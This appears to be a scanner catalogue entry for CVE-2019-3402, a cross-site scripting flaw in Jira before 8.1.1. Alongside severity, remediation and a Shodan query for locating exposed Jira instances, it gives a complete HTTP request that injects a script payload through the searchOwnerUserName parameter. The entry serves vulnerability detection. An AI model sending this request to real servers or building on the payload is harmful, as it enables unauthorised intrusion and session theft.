| Title | Jira < 8.1.1 - Cross-Site Scripting |
|---|---|
| Author | pdteam |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement. |
| Remediation | Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.12577 |
| CVE ID | CVE-2019-3402 |
| CWE ID | CWE-79 |
| Shodan Query | http.component:"Atlassian Jira"http.component:"atlassian jira"http.component:"atlassian confluence"cpe:"cpe:2.3:a:atlassian:jira" |
| Tags | cve cve2019 atlassian jira xss vuln |
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-3402.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-3402.pcap
N/AN/A